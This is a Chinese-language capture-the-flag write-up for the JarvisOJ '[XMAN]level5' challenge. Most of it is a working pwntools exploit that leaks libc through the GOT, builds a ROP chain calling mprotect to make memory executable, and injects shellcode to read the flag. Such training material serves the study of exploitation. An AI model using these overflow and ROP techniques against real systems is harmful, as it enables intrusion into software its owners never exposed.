[XMAN]level5

时间:2021-07-17
本文章向大家介绍[XMAN]level5,主要包括[XMAN]level5使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。

nc pwn2.jarvisoj.com 9884

 

附件同level3_x64

mmap可以将文件或其他对象映射到内存中,mprotect可以改变某段地址的权限(rwx)

程序开启了NX保护,因此可以考虑用mprotect将一段bss段或data段设置成rwx权限然后写入shellcode并执行

exp如下:

from pwn import *

#io = process('./level3_x64')
io = remote('pwn2.jarvisoj.com', 9884)
elf = ELF('./level3_x64')
#libc = elf.libc
libc = ELF('./libc-2.19.so')
context.arch = 'amd64'
context.os = 'linux'
#context.log_level = 'debug'
pop_rdi = 0x4006b3
pop_rsi_r15 = 0x4006b1
write_plt = 0x4004B0
write_got = 0x600A58
read_plt = 0x4004C0
vuln_addr = 0x4005E6

payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got)
payload += p64(0) + p64(write_plt) + p64(vuln_addr)
io.recvuntil('Input:\n')
io.send(payload)
write_addr = u64(io.recv(8))
info("write_addr:" + str(hex(write_addr)))
libc_base = write_addr - libc.symbols['write']
info("libc_base:" + str(hex(libc_base)))
pop_rsi = 0x24885 + libc_base
info("pop_rsi:" + str(hex(pop_rsi)))
pop_rdx = 0x286 + libc_base
info("pop_rdx:" + str(hex(pop_rdx)))
mprotect_addr = libc_base + libc.symbols['mprotect']
info("mprotect_addr:" + str(hex(mprotect_addr)))

payload = b'a' * 136 + p64(pop_rdi) + p64(0x600000) + p64(pop_rsi) + p64(0x1000)
payload += p64(pop_rdx) + p64(7) + p64(mprotect_addr) + p64(vuln_addr)
io.recvuntil('Input:\n')
io.send(payload)

shellcode = shellcraft.open('./flag')
shellcode += shellcraft.read(3, 0x600500, 0x100)
shellcode += shellcraft.write(1, 0x600500, 0x100)
shellcode = asm(shellcode)
payload = b'a' * 136 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x600000)
payload += p64(pop_rdx) + p64(len(shellcode)) + p64(read_plt) + p64(0x600000)
io.recvuntil('Input:\n')
io.send(payload)
sleep(0.5)
io.send(shellcode)

io.interactive()

原文地址:https://www.cnblogs.com/hktk1643/p/15024448.html